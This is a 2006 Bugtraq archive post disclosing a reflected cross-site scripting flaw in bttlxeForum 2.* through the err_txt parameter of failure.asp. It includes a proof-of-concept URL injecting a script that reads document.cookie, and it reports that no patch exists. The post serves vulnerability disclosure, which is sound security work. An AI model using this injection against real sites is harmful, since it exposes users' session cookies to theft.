[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

bttlxeForum 2.* XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: bttlxeForum 2.* XSS Vulnerability
From: stormhacker@xxxxxxxxxxx
Date: 26 Feb 2006 18:05:15 -0000

--------------------Summary----------------
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus 
(worlddefacers.de securitycentra.com)
-----------------Description---------------
Vulnerable Script: failure.asp
--------------Exploit----------------------
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.cookie);</script>
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: runvirus
(worlddefacers.de securitycentra.com)

Prev by Date: recursive DNS servers DDoS as a growing DDoS problem
Next by Date: Re: Bypass Fortinet anti-virus using FTP
Previous by thread: Re: recursive DNS servers DDoS as a growing DDoS problem
Next by thread: Re: Bypass Fortinet anti-virus using FTP
Index(es):
- Date
- Thread